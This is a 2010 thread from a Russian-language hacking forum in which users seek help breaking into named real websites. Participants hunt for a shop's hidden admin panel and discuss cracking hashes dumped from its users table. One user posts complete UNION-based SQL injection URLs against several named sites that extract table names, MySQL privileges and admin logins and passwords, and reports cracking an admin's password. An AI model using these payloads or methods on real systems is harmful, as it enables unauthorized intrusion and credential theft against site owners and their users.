HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #15491  
Старый 02.11.2010, 19:35
-PRIVAT-
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
Провел на форуме:
344917

Репутация: 17
По умолчанию

Цитата:
Сообщение от SEWERN  
SEWERN said:
Кто может помочь с поисками адм http://www.shopzooly.com ?
адм не ВП , а "OnePound"
http://www.shopzooly.com/login.php
 
Ответить с цитированием

  #15492  
Старый 02.11.2010, 19:37
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401

Репутация: 0
По умолчанию

Цитата:
Сообщение от -PRIVAT-  
-PRIVAT- said:
http://www.shopzooly.com/login.php
кэп говорит что это форма авторизации юзеров, а не админов.
 
Ответить с цитированием

  #15493  
Старый 02.11.2010, 19:49
-PRIVAT-
Участник форума
Регистрация: 17.04.2010
Сообщений: 221
Провел на форуме:
344917

Репутация: 17
По умолчанию

Цитата:
Сообщение от d1v  
d1v said:
кэп говорит что это форма авторизации юзеров, а не админов.
Возможно и админа авторизует. Часто так бывает, знаю по опыту.
 
Ответить с цитированием

  #15494  
Старый 02.11.2010, 19:49
SEWERN
Участник форума
Регистрация: 09.01.2009
Сообщений: 155
Провел на форуме:
2253612

Репутация: 94
По умолчанию

Цитата:
Сообщение от d1v  
d1v said:
кэп говорит что это форма авторизации юзеров, а не админов.
верно кэп) это только юзеры , для админов есть отдельная админка (я это знаю на 100%).

Но найти ее трудновато (( "robots.txt" нету(((
 
Ответить с цитированием

  #15495  
Старый 02.11.2010, 21:00
d1v
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401

Репутация: 0
По умолчанию

Цитата:
Сообщение от SEWERN  
SEWERN said:
верно кэп) это только юзеры , для админов есть отдельная админка (я это знаю на 100%).
Но найти ее трудновато (( "robots.txt" нету(((
просканил админфайндером и интеллитемпером - результата нет.

вывод: админка в рандомной папке, на другом порту или ваще локальная.
 
Ответить с цитированием

  #15496  
Старый 02.11.2010, 22:46
JohnnyBGoode
Guest
Сообщений: n/a
Провел на форуме:
8669

Репутация: 5
По умолчанию

Есть SQL inj

Определил названия таблиц,названия столбцов

Есть в users два таких столбца : password и current_hash.

В котором из них пароль хранится ? В password - MYSQL хэш (расшифровал его,но при авторизации ошибку выдает),в current_hash - md5
 
Ответить с цитированием

  #15497  
Старый 02.11.2010, 22:49
Bb0y
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224

Репутация: 388
Отправить сообщение для Bb0y с помощью ICQ Отправить сообщение для Bb0y с помощью Yahoo
По умолчанию

2JohnnyBGoode возможно кэпую, но данные из current_hash расшифровать не пробовал?
 
Ответить с цитированием

  #15498  
Старый 02.11.2010, 22:53
JohnnyBGoode
Guest
Сообщений: n/a
Провел на форуме:
8669

Репутация: 5
По умолчанию

Цитата:
Сообщение от Bb0y  
Bb0y said:
2
JohnnyBGoode
возможно кэпую, но данные из current_hash расшифровать не пробовал?
пытался,положительного результата не достиг

И если тот расшифрованный пароль зашифровать в md 5,то результаты не сходятся
 
Ответить с цитированием

  #15499  
Старый 03.11.2010, 00:53
Gedj
Познающий
Регистрация: 15.09.2008
Сообщений: 54
Провел на форуме:
612815

Репутация: 46
По умолчанию

Цитата:
Сообщение от JohnnyBGoode  
JohnnyBGoode said:
пытался,положительного результата не достиг
И если тот расшифрованный пароль зашифровать в md 5,то результаты не сходятся
Ну тогда пробуй расшифровать current_hash сам неможеш выложи на ачат
 
Ответить с цитированием

  #15500  
Старый 03.11.2010, 13:42
nimferus
Guest
Сообщений: n/a
Провел на форуме:
1094

Репутация: 0
По умолчанию

Всем добрый день. Все вопросы по Sql inj

Первый вопрос, что делать если не могу найти таблицу пользователей, где то встречал уже этот же вопрос, но поиском найти не смог.

На пример :

Цитата:
Сообщение от None  
http://cib.net.ua/catalog.php?catalog_mode=np&list_mode=details&cat= 12&ucat=124&code=1900+and+1=0+union+select+1,2,3,4 ,5,6,7,8,9,10,11,12,13,14,15,16,17,table_name+from +information_schema.tables+limit+0,100+--+
Всё перебрал а такой таблицы найти не смог.

Я подумал, что делаю что то не так, и решил посмотреть в теме Sql инъекции.

Взял последний сайт. Убрал то что там было, и решил сделать сам всё с самого начала.

Вот так перебрал до 50, результат - ничего не найдено

Цитата:
Сообщение от None  
http://www.krost.ru/index.php?id=91&dep=&krost_news=97+and+1=0+UnIon+s elECt+1,2,table_name,4,5,database(),7,8,9+from+inf ormation_schema.tables+limit+50,100+--+
Но, тут возникает вопрос, ведь tracy как то узнал

Цитата:
Сообщение от None  
http://www.krost.ru/index.php?id=91&dep=&krost_news=97+and+1=0+UnIon+s elECt+1,2,file_priv,4 ,5,6,7,8,9+from+mysql.user+where+user='alexey1'+--+
вопрос как? растолкуйте пожалуйста этот момент.

==================================

Последний вопрос, возможно самый тупой.

У меня всё получилось, я узнал логин и пароль админа

Цитата:
Сообщение от None  
http://www.stepka.com.ua/?mod=viewProduct&id='3'+and+1=0+union+select+1,2,3 ,4,5,concat_ws(0x03a,login,passwrd),7,8,9+FROM+use rs
расшифровал хэш, НО я могу найти админку, поискав по форуму нашёл 1 скрипт и какой то софт, для автоматизации этого процесса, но прогнав этот сайт, всё равно ничего не нашёл. Возможно что то посоветуете?

===================================

Ещё вспомнил

Вот так, если поля логин и пассворд

Цитата:
Сообщение от None  
http://www.krost.ru/index.php?id=91&dep=&krost_news=97+and+1=0+UnIon+s elECt+1,2,column_name,4,5,database(),7,8,9+from+in formation_schema.columns+where+table_name='USER'+l imit+11,100+--+
Но после такого запроса

Цитата:
Сообщение от None  
http://www.krost.ru/index.php?id=91&dep=&krost_news=97+and+1=0+UnIon+s elECt+1,2,login,4,5,password,7,8,9+from+USER+limit +0,100+--+
получаю

Цитата:
Сообщение от None  
Table 'krost.USER' doesn't exist
Что я делаю не так?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ